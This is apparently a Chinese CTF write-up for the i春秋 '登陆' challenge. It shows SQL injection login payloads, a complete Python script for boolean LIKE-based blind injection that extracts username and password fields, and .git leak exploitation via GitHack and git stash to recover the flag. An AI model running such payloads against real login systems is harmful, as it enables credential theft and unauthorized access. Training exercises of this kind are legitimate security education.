i春秋-登陆(sql盲注爆字段,.git缓存利用)

练习平台地址

竞赛中心

题目描述

先登陆再说

题目内容

就是一个登录框

测试登录

用户名:admin' or 1=1#

密码:随便输

返回密码错误
用户名:随便输

密码:随便输

返回用户名不存在

这里就可以确定时一个bool盲注了

这里提供一个like注入的python脚本

代码逻辑就是给出一个列表,用列表中的字符不断拼接内容作为payload

python 复制代码
#-*- coding:utf-8 -*-
from urllib.request import urlopen
from urllib import parse,request
import sys
import threading

url = 'http://eci-2ze7mdt9g8r0p73g7mmo.cloudeci1.ichunqiu.com/Challenges/login.php'

def get_database_length():
   for i in range(1,sys.maxsize):
      username= "admin' or length(database())>{0}#"
      username = username.format(i)
      values = {"username":username, 'password':''}
      data = parse.urlencode(values).encode('utf-8')
      response = request.Request(url, data)
      response = urlopen(response)
      if len(response.read().decode()) != 4:
         print("当前数据库长度为:", i)
         return i

def get_database_name():
   global lock
   lit=list("0123456789qwertyuioplkjhgfdsazxcvbnmPOIUYTREWQASDFGHJKLMNBVCXZ")
   #后台SQL语句形如:
   #select xxx from xxx where username='' or 其他字段=xxx#
   #我们把其他字段替换成user_n3me或者p3ss_w0rd即可得出表中的用户名和密码字段
   username="admin' or p3ss_w0rd like '{0}%'#"
   #  username="admin' or p3ss_w0rd like '{0}%'#"
   database=''
   print("Start to retrive the database")
   while True:
      curId=0
      while True:
         if curId == len(lit):
            break
         i = curId
         curId += 1
         un=username.format(database+lit[i])
         print(un)
         values = {"username":un, 'password':''}
         data = parse.urlencode(values).encode('utf-8')
         response = request.Request(url, data)
         response = urlopen(response)
         if len(response.read().decode()) == 4:
            database=database+lit[i]
            print("the database is :%s" % database)
            break
      if curId == len(lit):
         print(database)
         break

#print(get_database_length())
get_database_name()

关键部分

url的地址改为题目的地址

POST发送的注入语句,检查源代码发现这两个字段很皮,应该是当前数据库中的两个表格

username="admin' or p3ss_w0rd like '{0}%'#"

username="admin' or user_n3me like '{0}%'#"

最后可以跑出用户名和密码

用户名:bctf3dm1n

密码:2bfb1532857ddc0033fdae5bde3facdf #adminqwe123666

成功登录

登录后得到了新的提示------存在.bctfg1t隐藏文件

猜测这里是.git文件泄露

直接上GitHack!!!

查看日志

提示不要怀疑flag就在git,说明不在这里

结合题目提示的缓存

​git​​​中与缓存相关的就是​​stash​​​,我们进入下载下来的网站目录,再进入​​.git​​​目录,再进如​​refs​​​目录,之后​​cat stash​​​:得到一个​​commit​​

显示隐藏的项目

查看stash得到commit

git reset --hard commit​​​,之后再查看​​flag.php

git reset --hard bee231dcc3e136cf01d4b0a075765a9490ecfa87

flag

flag{f075ec24-0710-464d-9458-2b442a2c73a4}

注意事项

1.当尝试ascii​​​获取数据库名字失败,要考虑可能后端对某些字符串进行了过滤,可以尝试使用​​like​​盲注来进行替代

2.如果使用information_schema​​数据库跑表时出现问题,那么很可能是这个被过滤了,我们要去寻找有没有表名的有关信息,不然无法得到结果

3.​git​​​中与缓存相关的就是​​stash​​​,查看stash可以得到一个commit,执行命令git reset --hard commit可以将当前分支的状态强制重置到指定的commit(提交)状态

相关推荐
神经毒素1 小时前
WEB安全--社会工程--SET钓鱼网站
安全·web安全
琢磨先生David5 小时前
重构数字信任基石:Java 24 网络安全特性的全维度革新与未来防御体系构建
java·web安全·密码学
见青..9 小时前
【学习笔记】文件包含漏洞--本地远程包含、伪协议、加密编码
前端·笔记·学习·web安全·文件包含
lally.11 小时前
2025蓝桥杯省赛网络安全组wp
web安全·蓝桥杯
CyberSecurity_zhang11 小时前
汽车网络安全 -- 理解暴露面、攻击面和攻击向量
网络安全·信息安全·汽车
xiaoniu66715 小时前
毕业设计-基于机器学习入侵检测系统
网络·安全·web安全
东方翱翔17 小时前
第十六届蓝桥杯大赛软件赛省赛第二场 C/C++ 大学 A 组
算法·职场和发展·蓝桥杯
Suckerbin17 小时前
pikachu靶场-敏感信息泄露
网络·学习·安全·网络安全
wuqingshun31415918 小时前
蓝桥杯 16. 密文搜索
c++·算法·职场和发展·蓝桥杯·深度优先
理智的灰太狼19 小时前
题目 3320: 蓝桥杯2025年第十六届省赛真题-产值调整
蓝桥杯